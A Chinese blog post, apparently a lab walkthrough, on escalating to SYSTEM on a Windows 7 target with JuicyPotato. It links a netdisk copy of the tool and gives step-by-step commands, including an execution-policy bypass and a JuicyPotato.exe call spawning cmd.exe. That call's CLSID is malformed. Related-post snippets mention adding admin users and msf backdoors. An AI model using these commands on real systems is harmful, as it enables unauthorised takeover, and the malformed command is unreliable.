多汁土豆(JuicyPotato)的提权使用

已于 2023-04-21 16:58:33 修改
阅读量852 收藏 2
点赞数
文章标签: 安全
于 2023-04-21 15:51:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhanqinli/article/details/130285592
版权

下面附带我使用的版本连接,百度网盘自取

链接:https://pan.baidu.com/s/1Ev-0THVltaSMDipFvBcrFg
提取码:heco

也可以官方下载https://github.com/ohpe/juicy-potato

具体原理我就不阐述了,其它博主都介绍得很详细。

1、将其放到我们需要提权的靶机中,这里我用的是windows7

2、在命令行窗口使用whoami /priv查看权限,如果全都禁用则无法提权

3、运行powershell  -executionpolicy bypass -file clsid.ps1 >CLSID.list,具体根据自己的文件名称来

 4、接着打开结果日志result.log文件,可以看到有部分的clisd是system权限,选择其中一个,在命令行中输入>JuicyPotato.exe -t t -p c:\windows\system32\cmd.exe -l 1111 -c {000C101C-0000-0000-C000-0000000000461}

5、运行成功后会自动弹出命令行窗口,我们查看当前系统权限

不是小学生
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
JuicyPotato
b10d9的博客
01-27 3585
需要了解的几个知识点 BITS服务是什么 BITS是一个与网络传输相关的系统服务。可用于上传下载文件到HTTP或SMB服务器,Windows更新也用到了BITS,BITS可以实现网络重连或系统重启后,续传文件。 BITS是与.NET/C/C++开发相关的COM接口。BITS是一种COM服务。 BITS会监听本地6666端口。 RottenPotatoNG是什么 基于BITS服务进行工具。 当具备SeImpersonate和SeAssignPrimaryToken限时,禁用BITS服务,并占用
BadPotato:Windows升BadPotato
03-19
土豆 Windows 2012-2019 Windows 8-10 引用
webshell_小神器JuicyPotato多种应用场景详解
weixin_42176827的博客
01-12 1236
0X00-Juicy-Potato简介Juicy Potato江湖人称烂土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(带有糖的RottenPotatoNG,带有一点液,即Windows服务帐户中的**另一种本地特升级工具)到NT AUTHORITY \ SYSTEM ***)追根到底是一种Windows的本地工具,利用了COM对象进行 ...
Potato(原理简述)
qq_18811919的博客
12-29 1198
在红蓝对抗过程中Web打点之后往往需要进行才能进行横向操作,本篇文章将简单讲述土豆原理。
土豆Juicypotato原理和利用
热门推荐
god_Zeo的安全博客
05-25 1万+
0x00 Potato(烂土豆的原理: 所谓的烂土豆就是俗称的MS16-075 可以将Windows工作站上的特从最低级别升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特级别。 一、简单的原理: 攻击者可以诱骗用户尝试使用NTLM对他的计算机进行身份验证,则他可以将该身份验证尝试中继到另一台计算机! Microsoft通过使用已经进行的质询来禁止同协议NTLM身份验证来对此进行修补。这意味着从一个主机回到自身的SMB-> SMB NTLM中继
小神器-JuicyPotato多种应用场景详解
J0o1ey Blog
03-25 7381
0X00-Juicy-Potato简介 Juicy Potato江湖人称烂土豆,是在MS16-075漏洞利用工具RottenPotatoN工具的基础上做了扩展(A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows S...
美味餐饮网页模板
01-22
美味餐饮网页模板
水果响应式网页模板
01-22
水果响应式网页模板
Web-Technologies:多
06-10
网络技术Juicy • 创建一个Web 应用程序; • 管理面板:添加/... • 直接在网站上支付发票,使用客户的地理位置(国家/地区)增值税可以独立于国家开具发票; • 为客户和总销售额(周/月)生成报告(HTML + CSV)。
tribe:甜多的食物
05-16
部落 部落是一种完全不同,更自然和简洁的软件构建方式。 该软件是极具实验性的,但是在构建许多不同类型的应用程序的过程中,它大大降低了复杂性。 很快会有更多的信息。 目前,您想查看... 样品 ...
Pulpy:多的全功能网络日历
06-14
稀烂 多的全功能网络日历,基于 ReactJS。 在这里查看它的实际效果: : 执照 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可 请参阅许可证文件。
Potato小结
wo41ge的博客
11-11 1万+
前言 当我们拿到webshell 却苦于无法 早之前有巴西烤肉,有pr 今天 来一个土豆合集 妈妈再也不担心我的webshell无法了 Hot Potato 前言 利用 Windows 中的已知问题在默认配置中获得本地升 即 NTLM 中继(特别是 HTTP->SMB 中继)和 NBNS 欺骗 攻击者可以在安装了Windows操作系统的工作站中将自己的低升至NT AUTHORITY\SYSTEM 影响范围 Windows 7、8、10、Server 2008 和 Ser
域渗透之热土豆
weixin_45612728的博客
02-18 445
注意这个不是域控的管理身份,而是利用普通的域用户进行取为本地的管理员限.只需要知道普通域用户的账号和密码即可,这个可以通过抓取本地的用户hash进行用hashcat进行破解即可. 一开始使用普通的域用户来创建用户是创建不成功的. 2.使用Potato.exe来进行创建用户. ip是本地的域用户ip,net user是创建一个用户,net localgroup是添加到管理员组中. Potato.exe -ip 192.168.0.207 -disable_exhaust true -cmd "C:
Rotten/Juicy Potato工原理分析
qq_42045349的博客
06-25 1233
@TOCRotten/Juicy Potato原理分析 Rotten/Juicy Potato工原理分析 当 DCOM 对象被传递到进程外 COM 服务器时,对象引用被编组在 OBJREF 流中。对于按引用编组,这会导致生成 OBJREF_STANDARD 流,该流为服务器供足够的信息以定位原始对象并绑定到它。除了对象的标识还有一个 RPC 绑定字符串列表(包含一个 TowerId 和一个字符串)。当发生解组时,通过将塔指定为 NCACN_IP_TCP 和host[port]形式的字符串,这可以被
土豆 (ms16-075) 方法
good good study
03-11 9799
所谓的烂土豆就是俗称的MS16-075,其是一个本地,是针对本地用户的,不能用于域用户。可以将Windows工作站上的特从最低级别升到“ NT AUTHORITY \ SYSTEM” – Windows计算机上可用的最高特级别。
土豆配合令牌窃取复现
m0_65096687的博客
05-13 159
土豆配合令牌窃取是用来解决普通令牌窃取因为webshell限太低无法成功。1.先用msf生成一个windows的后门监听上线。4.使用msf自带的令牌窃取功能。环境:内网kali和win10。3.利用msf上传烂土豆。先查看一下未限。2.在网上下载烂土豆
语音控制系统的安全挑战与防御策略(下)
声纹感知 洞察芯声
05-29 1102
活性检测已成为VCS中一种普遍的防御策略,主要设计用来确定语音命令是否来自真实的人类。这种方法背后的基本前是,大多数恶意命令都是机器生成的。这些命令通常通过扬声器播放或直接通过音频文件(如WAV文件)输入到VCS API中。与这些人工产生的命令不同,真正的人类用户不会以这种方式生成语音命令。因此,通过识别人类语音的特征,活性检测旨在过滤掉这些非人类、机器生成的输入,从而增强VCS的安全性。
内网安全之证书模版的管理
最新发布
weixin_45910629的博客
05-29 1161
证书模板 Certificate templates 是 CA 证书颁发机构的一个组成部分,是证书策略中的重要元素,是用于证书注册、使用和管理的一组规则和格式。当 CA 收到对证书的请求时,必须对该请求应用一组规则和设置,以执行所请求的功能,例如证书颁发或更新。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。证书模板是在 CA 上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机供了关于如何创建和交有效的证书请求的说明。基于证书模板的证书只能由企业 CA 颁发。
html使用描述列表 样例
09-21
描述列表(Description List)是HTML中的一个标记语言,用于展示一组名称和对应的描述信息。描述列表由<dl>标签定义,每个名称由<dt>标签定义,每个描述由<dd>标签定义。下面是一个样例: ```html <dl> <dt>苹果</dt> <dd>一种水果,通常是红色或绿色,甜而多。</dd> <dt>香蕉</dt> <dd>一种长条状水果,通常是黄色,口感柔软。</dd> <dt>橙子</dt> <dd>一种圆形水果,通常是橙色,含有丰富的维生素C。</dd> </dl> ``` 上面的代码定义了一个描述列表,包含了三个条目。每个条目由<dt>标签定义,表示名称,后面跟着一个<dd>标签,表示对应的描述信息。在样例中,第一个条目的名称是“苹果”,描述是“一种水果,通常是红色或绿色,甜而多”。依此类推,第二个条目的名称是“香蕉”,描述是“一种长条状水果,通常是黄色,口感柔软”,第三个条目的名称是“橙子”,描述是“一种圆形水果,通常是橙色,含有丰富的维生素C”。 描述列表可以用于展示任何有名称和对应描述的信息,例如产品特性、定义术语等。它的结构简单明了,可以帮助读者更好地理解和记忆信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值